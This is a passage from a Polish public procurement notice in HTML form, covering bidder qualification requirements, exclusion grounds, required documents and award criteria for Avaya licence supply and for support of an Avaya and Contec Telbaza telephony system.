zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa warunku we wskazanym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Dla Części 1:Wykonawca musi wykazać, że należycie wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 zamówienia odpowiadające swoim przedmiotem przedmiotowi niniejszego zamówienia, tj. wykonał dostawę licencji na wsparcie producenta dla urządzeń Avaya o wartości co najmniej 50.000 zł brutto każde z nich.Dla Części 2:Wykonawca musi wykazać, że należycie wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 zamówienia odpowiadające swoim przedmiotem przedmiotowi niniejszego zamówienia, tj. usługi wsparcia i utrzymania rozproszonego systemu telekomunikacyjnego zbudowanego z wykorzystaniem urządzeń Avaya dla nie mniej niż 3 lokalizacji w każdym zamówieniu, usługi wsparcia i utrzymania centralnego systemu taryfikacji połączeń telefonicznych zbudowanego z wykorzystaniem produktu firmy Contec - Telbaza, dla nie mniej niż 300 abonentów (licencji) w każdym zamówieniu oraz usługi wsparcia i utrzymania w ruchu systemu telekomunikacyjnego Call Center z nagrywaniem połączeń telefonicznych i raportowaniem zbudowanego z wykorzystaniem urządzeń i oprogramowania Avaya dla nie mniej niż 5 stanowisk agentów w każdym zamówieniu o wartości co najmniej 40.000,00 zł brutto każde;Dla Części 2:Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania niniejszego zamówienia, posiadającymi udokumentowane kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do realizacji niniejszego zamówienia, tj. dysponuje, co najmniej:a)	2 osobami posiadającymi ważny certyfikat Avaya Certified Implementation Specialist (ACIS) (należy podać numer certyfikatu lub załączyć kopię) lub inny dokument/certyfikat na równoważnym poziomie, wydany przez Avaya lub inny podmiot akredytowany przez Avaya, potwierdzający kwalifikacje niezbędne do samodzielnej instalacji i konfiguracji oraz podstawowej diagnostyki produktów Avaya (należy podać numer certyfikatu lub załączyć kopię);b)	1 osobą posiadającą ważny certyfikat Avaya Professional Design Specialist (APDS) (należy podać numer certyfikatu lub załączyć kopię) lub dokument/certyfikat na równoważnym poziomie, wydany przez Avaya lub inny podmiot akredytowany przez Avaya, potwierdzający kwalifikacje niezbędne do projektowania i wdrażania systemów Avaya (należy podać numer certyfikatu lub załączyć kopię);c)	2 osobami posiadającymi ważny certyfikat Avaya Certified Support Specialist (ACSS) lub dokument/certyfikat na równoważnym poziomie, wydany przez Avaya lub inny podmiot akredytowany przez Avaya, potwierdzający kwalifikacje niezbędne do samodzielnej instalacji, zaawansowanej konfiguracji i diagnostyki oraz monitorowania i raportowania stanu produktów Avaya Unified Communication i Call Center;d)	1 osobą posiadającą kwalifikacje zawodowe polegające na posiadaniu ważnego certyfikatu w zakresie Administracji programem Telbaza SQL firmy Contec.Każdą z kwalifikacji wymienioną w pkt 1.3.3. (Część 2) może spełniać jedna osoba. Minimalna liczba osób, którą będzie dysponował Wykonawca to dwie osoby.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Zamawiający wykluczy wykonawców w sytuacji określonej w art. 24 ust. 1 pkt 12-23 lub ust. 5 pkt 1 ustawy Pzp, w tym także w przypadku, gdy okoliczności wskazane w art. 24 ust. 1 pkt 12-23 lub ust. 5 pkt 1 ustawy Pzp dotyczyć będą podmiotów, na których zdolnościach lub sytuacji polega Wykonawca. Na potwierdzenie, że Wykonawca nie podlega wykluczeniu z udziału w postępowaniu powinien on złożyć następujące dokumenty:3.1.	Załączane do oferty oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodne ze wzorem określonym formularzem nr DP.1;3.2.	Składany na wezwanie Zamawiającego (dotyczy Wykonawcy, którego oferta zostanie najwyżej oceniona) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy;W przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca składa, na wezwanie Zamawiającego skierowane do Wykonawcy, którego oferta zostanie najwyżej oceniona, dotyczący tego podmiotu aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast:1)	żądanych przez Zamawiającego: dokumentów, o których mowa w ppkt 3.2, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,Dokumenty, o których mowa w ppkt 1 lit. a winny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się takich dokumentów zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie wymienione w pkt 3.1 i dokument wskazany w pkt 3.2 powinien złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.W celu potwierdzenia, iż oferowane dostawy/usługi odpowiadają wymaganiom Zamawiającego Wykonawca załączy: (dotyczy Części 2)a) dokument potwierdzający, że Wykonawca posiada status Autoryzowanego Partnera firmy Avaya na poziomie co najmniej Sapphire.Dokument o którym mowa powyżej składa wyłącznie podmiot, którego oferta zostanie oceniona jako najkorzystniejsza, zgodnie z wezwaniem wskazanym w punkcie 8.3 Części I.Oświadczenia wymagane dla potwierdzenia, że brak jest podstaw do wykluczenia Wykonawcy z postępowania oraz o spełnianiu warunków udziału w postępowaniu powinny być składane w formie oryginału. W przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia powinno być przedłożone w formie oryginału. Pozostałe dokumenty wskazane w części II SIWZ powinny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca lub podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, w zakresie dokumentów, które każdego z nich dotyczą. Dokumenty sporządzone w języku obcym powinny być składane wraz z tłumaczeniem na język polski. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie następujących dokumentów i oświadczeń:2.1.	Załączanych do oferty: oświadczenia o spełnianiu warunków udziału w postępowaniu, zgodnego ze wzorem określonym formularzem nr DP.1;2.2.	Składanych na wezwanie Zamawiającego skierowane do Wykonawcy, którego oferta zostanie najwyżej oceniona:2.2.1	wykazu dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, zgodnego ze wzorem określonym formularzem nr DP.3 ,,Wykaz wykonanych zamówień";Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje lub inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.2.2.2.	wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, zgodnego ze wzorem określonym formularzem nr DP.4 ,,Potencjał kadrowy", wraz z wymaganymi do oceny spełnienia warunku w zakresie dysponowania osobami zdolnymi do wykonania zamówienia informacjami na temat zakresu wykonywanych przez nie czynności, uprawnień, wykształcenia, kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia;W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Z tego względu w przypadku wspólnego ubiegania się o zamówienie należy wskazać warunek, którego spełnianie wykazuje dany Wykonawca. Pozostałe wymienione w pkt 2.2 dokumenty również powinny dotyczyć tego Wykonawcy, spośród Wykonawców składających wspólną ofertę, który wykazuje spełnienie danego warunku.W przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów, zobowiązany jest udowodnić, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Wykonawca dokumenty w tym zakresie składa wraz z ofertą. W celu oceny, czy Wykonawca będzie dysponował niezbędnymi zasobami innych podmiotów w stopniu umożliwiającym należyte wykonanie zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający wymaga złożenia dokumentów określających w szczególności:2.4.1	zakres dostępnych Wykonawcy zasobów innego podmiotu,2.4.2	sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonaniu zamówienia,2.4.3	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia,2.4.4	czy podmiot, na zdolnościach którego Wykonawca polega, tj. doświadczenie, osoby zdolne do wykonania zamówienia, zrealizuje usługi będące przedmiotem zamówienia, których wskazane zdolności dotyczą,Informacje wskazane w pkt 2.4.1 -2.4.4 mogą być zawarte w zobowiązaniu, o którym mowa powyżej.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">W celu potwierdzenia, iż oferowane dostawy/usługi odpowiadają wymaganiom Zamawiającego Wykonawca załączy: (dotyczy Części 2)a) dokument potwierdzający, że Wykonawca posiada status Autoryzowanego Partnera firmy Avaya na poziomie co najmniej Sapphire.Dokument o którym mowa powyżej składa wyłącznie podmiot, którego ofertazostanie oceniona jako najkorzystniejsza, zgodnie z wezwaniem wskazanym w punkcie 8.3 Części I.Oświadczenia wymagane dla potwierdzenia, że brak jest podstaw do wykluczenia Wykonawcy z postępowania oraz o spełnianiu warunków udziału w postępowaniu powinny być składane w formie oryginału. W przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia powinno być przedłożone w formie oryginału. Pozostałe dokumenty wskazane w części II SIWZ powinny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca lub podmiot, na którego zdolnościach lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, w zakresie dokumentów, które każdego z nich dotyczą. Dokumenty sporządzone w języku obcym powinny być składane wraz z tłumaczeniem na język polski. </span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Część I - Cena </TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Część I - Czas dostawy licencji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Część II - Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Część II - Czas realizacji zgłoszeń z priorytetem krytycznym</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CZĘŚĆ II - Czas reakcji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span 